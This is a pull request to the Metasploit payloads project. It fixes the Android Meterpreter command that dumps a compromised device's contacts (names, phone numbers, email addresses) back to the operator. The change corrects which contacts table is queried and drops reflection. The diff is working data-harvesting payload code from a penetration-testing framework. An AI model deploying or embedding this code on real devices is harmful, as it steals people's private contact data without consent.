### PR TITLE
fix android_dump_contacts display name duplicated in phone numbers list

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/android_dump_contacts.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/android_dump_contacts.java
@@ -5,6 +5,7 @@ import android.database.Cursor;
 import android.net.Uri;
 import android.os.Build;
 
+import android.provider.ContactsContract;
 import com.metasploit.meterpreter.AndroidMeterpreter;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
@@ -22,10 +23,6 @@ public class android_dump_contacts implements Command {
     private static final int TLV_TYPE_CONTACT_NAME = TLVPacket.TLV_META_TYPE_STRING
             | (TLV_EXTENSIONS + 9010);
 
-    private static final String classNameContacts = "android.provider.ContactsContract$Contacts";
-    private static final String classNameData = "android.provider.ContactsContract$Data";
-    private static final String classNameEmail = "android.provider.ContactsContract$CommonDataKinds$Email";
-    private static final String contentUri = "CONTENT_URI";
     private static final String _id = "_id";
     private static final String displayName = "display_name";
     private static final String contactId = "contact_id";
@@ -39,48 +36,37 @@ public class android_dump_contacts implements Command {
                 .getContentResolver();
 
         if (Integer.parseInt(Build.VERSION.RELEASE.substring(0, 1)) >= 2) {
-
-            Uri ContactUri = null, PhoneUri = null, EmailUri = null;
-            Class<?> c = Class.forName(classNameContacts);
-            ContactUri = (Uri) c.getField(contentUri).get(ContactUri);
+            Uri ContactUri = ContactsContract.Contacts.CONTENT_URI;
+            Uri PhoneUri = ContactsContract.CommonDataKinds.Phone.CONTENT_URI;
+            Uri EmailUri = ContactsContract.CommonDataKinds.Email.CONTENT_URI;
             Cursor cur = cr.query(ContactUri, null, null, null, null);
 
-            if (cur.getCount() > 0) {
+            while (cur.moveToNext()) {
+                TLVPacket pckt = new TLVPacket();
+                String id = cur.getString(cur.getColumnIndex(_id));
 
-                while (cur.moveToNext()) {
+                // Name
+                pckt.addOverflow(TLV_TYPE_CONTACT_NAME, cur.getString(cur.getColumnIndex(displayName)));
 
-                    TLVPacket pckt = new TLVPacket();
-
-                    String id = cur.getString(cur.getColumnIndex(_id));
-
-                    pckt.addOverflow(TLV_TYPE_CONTACT_NAME,
-                            cur.getString(cur.getColumnIndex(displayName)));
-
-                    c = Class.forName(classNameData);
-                    PhoneUri = (Uri) c.getField(contentUri).get(PhoneUri);
-                    Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
-                            new String[]{id}, null);
-
-                    while (pCur.moveToNext()) {
-                        pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
-                                pCur.getString(pCur.getColumnIndex(data1)));
-                    }
-                    pCur.close();
-
-                    c = Class.forName(classNameEmail);
-                    EmailUri = (Uri) c.getField(contentUri).get(EmailUri);
-                    Cursor emailCur = cr.query(EmailUri, null, contactId
-                            + " = ?", new String[]{id}, null);
-
-                    while (emailCur.moveToNext()) {
-                        pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
-                                .getString(emailCur.getColumnIndex(data1)));
-                    }
-                    emailCur.close();
-
-                    response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
-
+                // Number
+                Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
+                        new String[]{id}, null);
+                while (pCur.moveToNext()) {
+                    pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
+                            pCur.getString(pCur.getColumnIndex(data1)));
                 }
+                pCur.close();
+
+                // Email
+                Cursor emailCur = cr.query(EmailUri, null, contactId
+                        + " = ?", new String[]{id}, null);
+                while (emailCur.moveToNext()) {
+                    pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
+                            .getString(emailCur.getColumnIndex(data1)));
+                }
+                emailCur.close();
+
+                response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
             }
 
             cur.close();


### PR DESCRIPTION
While testing https://github.com/rapid7/metasploit-framework/pull/7846 I found that the display name is duplicated in the phone number field.
This fixes that issue (`android.provider.ContactsContract$Data` should be `android.provider.ContactsContract$CommonDataKinds$Phone`) and removes the use of reflection (which we no longer need, ever since https://github.com/rapid7/metasploit-payloads/commit/d1eb125688f3ccbf697aae6ab521ea417963a2cd)